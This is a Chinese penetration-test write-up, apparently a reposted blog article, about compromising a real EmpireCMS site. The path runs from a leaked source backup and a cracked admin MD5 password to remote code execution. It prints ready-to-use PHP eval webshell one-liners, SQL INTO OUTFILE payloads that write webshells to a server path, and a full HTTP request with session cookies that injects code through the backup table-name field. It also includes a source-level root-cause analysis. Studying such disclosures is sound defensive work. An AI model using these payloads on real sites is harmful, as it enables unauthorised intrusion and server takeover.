记一次从源码泄露到getshell（二）

淡淡的烟草味﹌ 2024-04-07 10:34 103阅读 0赞

### 0x00 前言 ###

文章所述漏洞已经提交至漏洞平台，且所有恶意操作均已复原

### 0x01 源码泄露 ###

http://www.xxx.com.cn/www.zip

老规矩拿到源码先通关关键词找敏感信息

key
    pwd
    passwd
    password

找到了半天居然找不到一个有效的密码

最后在robots.txt中看到CMS的信息-EmpireCMS

[![90825b18b87249ba959aeb6dfdf18d6c.png][]][90825b18b87249ba959aeb6dfdf18d6c.png 1]

查询知道是开源cms后，直接百度查询数据表结构

[![b25eb9ef76e1c493a8118bb93b5c1a5e.png][]][b25eb9ef76e1c493a8118bb93b5c1a5e.png 1]

知道了管理员记录表为phome\_enewsuser,在源码里全局搜索

### 0x02 敏感信息泄露 ###

[![c996adfab0d58ddd63fae20df03763a8.png][]][c996adfab0d58ddd63fae20df03763a8.png 1]

点击进去得到管理员用户名，密码hash和盐值

[![c11ffa01c379f44b83a531a079b506f5.png][]][c11ffa01c379f44b83a531a079b506f5.png 1]

直接解md5得到口令

[![9ccf4256130955a0548705c559f037e9.png][]][9ccf4256130955a0548705c559f037e9.png 1]

Kite/kite

得到口令后就是找到后台地址，由于是开源的百度一下就有了  
看一眼目录并没有修改后台地址，所以直接访问

http://www.xxx.com.cn/e/admin/

[![0b95b253b302a186ab365e016c7a7579.png][]][0b95b253b302a186ab365e016c7a7579.png 1]

得到具体的版本号为6.6

### 0x04 历史漏洞 ###

登录到后台后，因为是开源CMS，历史漏洞才是渗透的关键

直接搜索empireCMS漏洞，开始复现历史漏洞

##### 1.后台-模版-公共模版-js调用登陆模版getshell #####

还没有开始就已经结束

[![b381a29100805f13fec775ce887de54f.png][]][b381a29100805f13fec775ce887de54f.png 1]

Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist

好家伙，这是把表都删了吗

##### 2.后台数据表与系统模型-导入数据库模型getshell #####

EmpireCMS 7.5以及之前版本中的e/class/moddofun.php文件的LoadInMod函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。

[![a720310f51ccd662644eb0908a4ebce5.png][]][a720310f51ccd662644eb0908a4ebce5.png 1]

在本地先新建一个test.php.mod文件，内容为

<?php file_put_contents("lyy.php","<?php @eval(\$_POST['lyy']); ?>");?>

填入任意表名然后选择马上导入

[![2004aa3a1e8be5c16b296acbf8ecca70.png][]][2004aa3a1e8be5c16b296acbf8ecca70.png 1]

又是一个表不存在，GG

[![2d11a3da5f58f65a4d47aad1b04012aa.png][]][2d11a3da5f58f65a4d47aad1b04012aa.png 1]

##### 3.后台备份与恢复数据-执行sql语句getshell #####

EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。

也就是后台提供了一个sql语句执行

[![00df6f88230f159ad3e76cc7128b374e.png][]][00df6f88230f159ad3e76cc7128b374e.png 1]

只要服务器mysql配置secure\_file\_priv 不当，就可以向服务器写入文件

**Payload**

select '<?php @eval($_POST[123])?>' into outfile '绝对路径/e/admin/lyy.php'

因为要向站点写入文件，所以必须知道绝对路径才行。

因为是无回显执行，也不能通过show mysql变量获取部分路径，所以也pass了

show variables like '%datadir%';

##### 4.后台备份与恢复数据-备份数据getshell #####

empirecms 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。

[![fcf237bd64bc822d3fef92f9bf842854.png][]][fcf237bd64bc822d3fef92f9bf842854.png 1]

选择任意一个表，开始备份抓包

[![653f8e9708c16b107a7418399bb72b0f.png][]][653f8e9708c16b107a7418399bb72b0f.png 1]

将tablename字段改为payload

@eval($_POST[123])

请求包

POST /e/admin/ebak/phome.php HTTP/1.1
    Host: www.xxx.com.cn
    Content-Length: 285
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://www.xxx.com.cn
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482_db
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: bxubwecmsdodbdata=empirecms; bxubwloginuserid=1; bxubwloginusername=Kite; bxubwloginlevel=1; bxubweloginlic=empirecmslic; bxubwloginadminstyleid=1; bxubwloginrnd=F3JiUXpyeXm6mWPTsdUG; bxubwloginecmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630
    Connection: close
    
    phome=DoEbak&mydbname=hdm1010482_db&baktype=phpinfo()&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0&readme=&autofield=&tablename%5B%5D=@eval($_POST[123])&chkall=on&Submit=%BF%AA%CA%BC%B1%B8%B7%DD

回显得到备份文件夹名

[![0a435cb30cf77d01e68b773ee6172b2a.png][]][0a435cb30cf77d01e68b773ee6172b2a.png 1]

hdm1010482_db_20211229152350

webshell连接备份文件夹下的config.php

http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php

成功getshell

[![c75f0f1d2611a5849fc15bed284e7795.png][]][c75f0f1d2611a5849fc15bed284e7795.png 1]

###### 原理分析 ######

因为手里有源码，就跟了一下这个漏洞

**首先定位**

直接全局搜索config.php就找到了

[![db244928330dba6a99ff39c4c9cc9c5c.png][]][db244928330dba6a99ff39c4c9cc9c5c.png 1]

在e/admin/ebak/class/functions.php文件中Ebak\_DoEbak存在文件写入操作

[![4c91900b2d550c3e2316ef5a22b446d2.png][]][4c91900b2d550c3e2316ef5a22b446d2.png 1]

$string="<?php
        \$b_table=\"".$b_table."\";
        ".$d_table."
        \$b_baktype=".$add['baktype'].";
        \$b_filesize=".$add['filesize'].";
        \$b_bakline=".$add['bakline'].";
        \$b_autoauf=".$add['autoauf'].";
        \$b_dbname=\"".$dbname."\";
        \$b_stru=".$bakstru.";
        \$b_strufour=".$bakstrufour.";
        \$b_dbchar=\"".addslashes($add['dbchar'])."\";
        \$b_beover=".$beover.";
        \$b_insertf=\"".addslashes($insertf)."\";
        \$b_autofield=\",".addslashes($add['autofield']).",\";
        \$b_bakdatatype=".$bakdatatype.";
        ?>";
        $cfile=$bakpath."/".$add['mypath']."/config.php";
        WriteFiletext_n($cfile,$string);

可以看到直接对$d\_table变量进行拼接

再看看写函数WriteFiletext\_n

[![30baeef1b51a1e842b804fbe31a5a16b.png][]][30baeef1b51a1e842b804fbe31a5a16b.png 1]

也没有对写入内容进行过滤，那么只需要知道如何控制$d\_table变量值即可

crtl+左键跟到上面

[![8cb200e288e0f8b0703cb6ebf7d37b82.png][]][8cb200e288e0f8b0703cb6ebf7d37b82.png 1]

而$count是$tablename的数量，$tablename是$add中tablename的键值

[![806a5d8556fd580735b3706c757862d7.png][]][806a5d8556fd580735b3706c757862d7.png 1]

找到调用Ebak\_DoEbak函数的位置，知道$add就是$\_POST

[![ec5efd07edda4d08184342c2f97b583b.png][]][ec5efd07edda4d08184342c2f97b583b.png 1]

那就很清楚了，他对POST传参的tablename进行了处理产生两个变量

$b\_table和$d\_table，其中$b\_table是被双引号包裹无法利用的

但是$d\_table没有双引号被包裹，且没有任意过滤直接写入.php文件，导致命令执行

###### 为什么不是其他参数？ ######

其他参数大部分是被双引号包裹的

没有被双引号包裹的参数都被强转int，如果传str会返回0 所以pass

[![f175ae2ea1e0a6d132420628b84ffa23.png][]][f175ae2ea1e0a6d132420628b84ffa23.png 1]

[![373c8d791f9c757d73c4ce35ed734d5c.png][]][373c8d791f9c757d73c4ce35ed734d5c.png 1]

[![5c2bac5f13cf6ba3105a39c978e8d892.png][]][5c2bac5f13cf6ba3105a39c978e8d892.png 1]

##### 3的后续 #####

在通过漏洞4获得站点真实路径后我又构造sql语句，尝试向站点直接webshell

select '<?php phpinfo();?>' into outfile '/data/home/hmu072095/htdocs/e/admin/lyy.php'

虽然爆了一个数据库连接错误，但是语句被成功执行，只是被写入的内容被替换成了空

[![e1f3a10eba52bfe04492122691e6fa4f.png][]][e1f3a10eba52bfe04492122691e6fa4f.png 1]

可以成功访问但没有内容

[![c32d181c7030cb02723009a8866cd833.png][]][c32d181c7030cb02723009a8866cd833.png 1]

可以写入正常字符

select 'test' into outfile '/data/home/hmu072095/htdocs/e/admin/1.txt'

[![1958ef592c69a61e051b3f67245c89af.png][]][1958ef592c69a61e051b3f67245c89af.png 1]

初步判断是对php标签做了过滤，尝试其他写法进行绕过

1.select '<? phpinfo(); ?>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'
    2.select '<script language="php"> phpinfo(); </script>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'
    3.select '<?php @eval($_POST[1])?>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'

只有最后的asp风格成功写入

[![7d0c8ec887b2f0beb3e32054a6e7abb3.png][]][7d0c8ec887b2f0beb3e32054a6e7abb3.png 1]

尝试访问无法执行 查了一下linux上默认不开PHP短标签配置项，溜了溜了

#### 总结 ####

1.通过御剑目录扫描工具对目标站点进行目录扫描，发现泄露了网站的备份文件www.zip，对其下载到本地进行源代码分析

2.通过phpstorm进行源代码加载，并搜索关键字key,pwd,password,passwd，并没有找到相关密码，通过robots.txt，发现是EmpireCMS

3.通过百度搜索EmpireCMS的数据表结构，发现phome\_enewsuser为管理员记录表，通过全局批量搜索phome\_enewsuser关键字，发现源码中泄露了网站的管理员的用户名和密码md5值，通过md5解密得到明文为kite

4.输入默认的后台路径/admin，可看到后台登录页面，输入得到的用户名和密码，即可登录后台。

5.在网站后台-模版-公共模版-js调用登陆模版处准备写入一句，发现表不存在,无法写入shell

6.在网站后台--系统--数据表与系统模板--管理数据表--导入系统模板，模板文件名：test.php.mod，且，存放的的数据表名为：phome\_ecm\_111,导入进入后，发现表不存在,无法写入shell

test.php.mod：

<?php file\_put\_contents("lyy.php","<?php @eval(\\$\_POST\['lyy'\]); ?>");?>

7.在网站后台--系统--备份与恢复数据--执行SQL语句，写入一句话，前提条件需要：mysql配置secure\_file\_priv 不当，且需要知道网站绝对路径以及EmpireCMS<=7.5版本，这里无法获取到网站绝对路径，无法写入shell

show variables like '%datadir%'; //查看网站绝对路径

select '<?php @eval($\_POST\[123\])?>' into outfile '绝对路径/e/admin/lyy.php' //写入一句话

8.empirecms 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行,那么在网站后台--系统--备份与恢复数据--恢复数据--选择任意一个表，开始备份抓包拦截。注意备份的目录，如果目录不存在，系统会自动生成一个目录名。抓包拦截，并修改，发送请求。

POST /e/admin/ebak/phome.php HTTP/1.1

Host: www.xxx.com.cn

Content-Length: 285

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://www.xxx.com.cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482\_db

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: bxubwecmsdodbdata=empirecms; bxubwloginuserid=1; bxubwloginusername=Kite; bxubwloginlevel=1; bxubweloginlic=empirecmslic; bxubwloginadminstyleid=1; bxubwloginrnd=F3JiUXpyeXm6mWPTsdUG; bxubwloginecmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630

Connection: close

phome=DoEbak&mydbname=hdm1010482\_db&baktype=phpinfo()&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1&mypath=hdm1010482\_db\_20211229152350&insertf=replace&waitbaktime=0&readme=&autofield=&tablename%5B%5D=@eval($\_POST\[123\])&chkall=on&Submit=%BF%AA%CA%BC%B1%B8%B7%DD

9.最终生成shell访问连接为(webshell连接备份文件夹下的config.php)：http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482\_db\_20211229152350/config.php

10.通过蚁剑连接一句话，并获取到网站的绝对路径(/data/home/hmu072095/htdocs/e/admin/)，这里可以直接通过网站后台--系统--备份与恢复数据--执行SQL语句

select '<?php phpinfo();?>' into outfile '/data/home/hmu072095/htdocs/e/admin/lyy.php' //发现被拦截：

select '<?php @eval($\_POST\[1\])?>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php' //可正常写入一句话

11.通过网站后台--模板管理--自定义页面--增加自定义页面--页面名称(123.php),文件名../../page.html,页面内容：

<?php fputs(fopen("shell.php","a"),'<?php phpinfo();@eval($\_POST\[cmd\]);?>')?>

访问链接：

http://www.xxx.com/e/admin/shell.php

原文链接： [https://xz.aliyun.com/t/10740][https_xz.aliyun.com_t_10740]

[90825b18b87249ba959aeb6dfdf18d6c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ac74c2bdeccd41b4a4da93f03162c3ab.png
[90825b18b87249ba959aeb6dfdf18d6c.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133335-08ba3984-6932-1.png
[b25eb9ef76e1c493a8118bb93b5c1a5e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7a6ab5a8eba445d888f7aa11373fe611.png
[b25eb9ef76e1c493a8118bb93b5c1a5e.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133341-0c185a98-6932-1.png
[c996adfab0d58ddd63fae20df03763a8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/54f5a484a67a48518e67e96b20504a9e.png
[c996adfab0d58ddd63fae20df03763a8.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133357-15f307de-6932-1.png
[c11ffa01c379f44b83a531a079b506f5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5f2c7adca49d4261a3cd1c81973748d8.png
[c11ffa01c379f44b83a531a079b506f5.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133402-186785da-6932-1.png
[9ccf4256130955a0548705c559f037e9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e2794ba1e42543efabbb501725b0c828.png
[9ccf4256130955a0548705c559f037e9.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133411-1e00da6e-6932-1.png
[0b95b253b302a186ab365e016c7a7579.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4fb261360e314cb58c17336135b8a53c.png
[0b95b253b302a186ab365e016c7a7579.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133541-53f912c6-6932-1.png
[b381a29100805f13fec775ce887de54f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/b0f054b2f88e4a52acc3a6e9adf0417f.png
[b381a29100805f13fec775ce887de54f.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133617-694132c6-6932-1.png
[a720310f51ccd662644eb0908a4ebce5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/1fc5d6ddccba4b75a45ec4abbba876e1.png
[a720310f51ccd662644eb0908a4ebce5.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133633-72a2363a-6932-1.png
[2004aa3a1e8be5c16b296acbf8ecca70.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/0b23873253cb4fedaef69418c504772b.png
[2004aa3a1e8be5c16b296acbf8ecca70.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133642-77cf8b26-6932-1.png
[2d11a3da5f58f65a4d47aad1b04012aa.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/b6a4e3ad40ac41f8b0fbb6bd0503446c.png
[2d11a3da5f58f65a4d47aad1b04012aa.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133645-7a051136-6932-1.png
[00df6f88230f159ad3e76cc7128b374e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/41bb76eb232247deafd1f57002516dd0.png
[00df6f88230f159ad3e76cc7128b374e.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133652-7de7034a-6932-1.png
[fcf237bd64bc822d3fef92f9bf842854.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7f685f15255b46f4a736193a0c0e608b.png
[fcf237bd64bc822d3fef92f9bf842854.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133728-93beb9a6-6932-1.png
[653f8e9708c16b107a7418399bb72b0f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/7c569bf1ae9641ab9ef0f80a27e3a992.png
[653f8e9708c16b107a7418399bb72b0f.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133733-96a0caa6-6932-1.png
[0a435cb30cf77d01e68b773ee6172b2a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/d4209fcc10df433cbd842c4d6d4e9f14.png
[0a435cb30cf77d01e68b773ee6172b2a.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133743-9c86b692-6932-1.png
[c75f0f1d2611a5849fc15bed284e7795.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a2b25779a1004a94aebcb4e654b19b07.png
[c75f0f1d2611a5849fc15bed284e7795.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133808-ab495b58-6932-1.png
[db244928330dba6a99ff39c4c9cc9c5c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4b64664259a7465483933ef8e6cd0984.png
[db244928330dba6a99ff39c4c9cc9c5c.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133816-b016d142-6932-1.png
[4c91900b2d550c3e2316ef5a22b446d2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/10945b8b0a904c24b0d90ea396adb706.png
[4c91900b2d550c3e2316ef5a22b446d2.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133820-b2766ac4-6932-1.png
[30baeef1b51a1e842b804fbe31a5a16b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5f85aaf09637438489720846082fdae8.png
[30baeef1b51a1e842b804fbe31a5a16b.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133827-b6c0df10-6932-1.png
[8cb200e288e0f8b0703cb6ebf7d37b82.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/57c0bb8e03894fdda926e790e3ab8f88.png
[8cb200e288e0f8b0703cb6ebf7d37b82.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133834-bb19ec1e-6932-1.png
[806a5d8556fd580735b3706c757862d7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/b7d2888d21034863b42e2a09d976092c.png
[806a5d8556fd580735b3706c757862d7.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133843-bfec1e74-6932-1.png
[ec5efd07edda4d08184342c2f97b583b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/d668b09eff8249c0a3ce3f0eb1ce1d8f.png
[ec5efd07edda4d08184342c2f97b583b.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133851-c4c2439c-6932-1.png
[f175ae2ea1e0a6d132420628b84ffa23.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3770ab2a9a3a427ea7d144dd75d265df.png
[f175ae2ea1e0a6d132420628b84ffa23.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133857-c8913e74-6932-1.png
[373c8d791f9c757d73c4ce35ed734d5c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/d5009dac90b244c6bee9d6303d4d561b.png
[373c8d791f9c757d73c4ce35ed734d5c.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133901-cb1d0650-6932-1.png
[5c2bac5f13cf6ba3105a39c978e8d892.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/fe0b1f1a571343668eef55728b702a5c.png
[5c2bac5f13cf6ba3105a39c978e8d892.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133906-ce18a2f6-6932-1.png
[e1f3a10eba52bfe04492122691e6fa4f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/404d7d8e3d624382b33f8c155270e90f.png
[e1f3a10eba52bfe04492122691e6fa4f.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133913-d241e96e-6932-1.png
[c32d181c7030cb02723009a8866cd833.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6a7c72d1cd4e465cb763c1fee7ff05a7.png
[c32d181c7030cb02723009a8866cd833.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133918-d50b51b2-6932-1.png
[1958ef592c69a61e051b3f67245c89af.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/9de195e85c99484ca02d1c3e6dbb91c4.png
[1958ef592c69a61e051b3f67245c89af.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133925-d95e99fe-6932-1.png
[7d0c8ec887b2f0beb3e32054a6e7abb3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/326ff2dc32a04456963d39312834f84e.png
[7d0c8ec887b2f0beb3e32054a6e7abb3.png 1]: https://xzfile.aliyuncs.com/media/upload/picture/20211230133937-e023b38c-6932-1.png
[https_xz.aliyun.com_t_10740]: https://xz.aliyun.com/t/10740